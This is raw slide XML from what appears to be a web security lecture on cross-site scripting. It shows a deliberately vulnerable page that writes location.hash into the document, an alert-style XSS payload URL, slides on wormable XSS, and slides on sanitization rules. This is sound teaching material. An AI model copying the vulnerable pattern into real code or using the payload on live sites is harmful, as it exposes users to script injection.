              </a:rPr>
              <a:t>;    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> + name);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6356352"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Doupé - 2/20/15</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6019800" y="2032000"/>
            <a:ext cx="386644" cy="1848556"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:headEnd type="none"/>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flipH="1">
            <a:off x="3414889" y="4007556"/>
            <a:ext cx="493889" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:headEnd type="none"/>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a:off x="3124200" y="4162778"/>
            <a:ext cx="3635022" cy="225778"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:headEnd type="none"/>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9016267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Client-Side XSS Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7" descr="Screen Shot 2014-10-08 at 7.10.31 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="28886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2996931460"/>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Client-Side XSS Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>test.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>location.hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> + name);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3259667" y="2469444"/>
            <a:ext cx="2760133" cy="1411112"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:headEnd type="none"/>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flipH="1">
            <a:off x="3414890" y="4007556"/>
            <a:ext cx="493888" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:headEnd type="none"/>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a:off x="3124200" y="4162778"/>
            <a:ext cx="3635022" cy="225778"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:headEnd type="none"/>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5872893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Client-Side XSS Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Screen Shot 2014-10-08 at 7.12.19 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="25460"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1997016124"/>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Wormable XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored XSS vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>on user-accessible action </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-propagating worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social networks particularly susceptible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is my hero” (2005)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tweetdeck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55861775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117600" y="0"/>
            <a:ext cx="6892419" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157382080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790700" y="0"/>
            <a:ext cx="5547732" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293727174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562100" y="0"/>
            <a:ext cx="6009515" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2022624311"/>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Solutions to XSS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XSS is very difficult to prevent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every piece of data that is returned to the user and that can be influenced by the inputs to the application must first be sanitized (GET parameters, POST parameters, Cookies, request headers, database contents, file contents)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Specific languages (e.g., PHP) often provide routines to prevent the introduction of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sanitization has to be performed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>differently depending on where the data is used </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This context-sensitivity of sanitization has been studied by the research community</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411378790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Solutions to XSS</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Rule 0: Never Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data Except in Allowed Locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Directly in a script: &lt;script&gt;...NEVER PUT UNTRUSTED DATA HERE...&lt;/script&gt;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inside an HTML comment: &lt;!--...NEVER PUT UNTRUSTED DATA HERE...--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In an attribute name: &lt;div ...NEVER PUT UNTRUSTED DATA HERE...=test /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In a tag name: &lt;...NEVER PUT UNTRUSTED DATA HERE... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="/test" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rule 1: HTML Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data into HTML Element Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
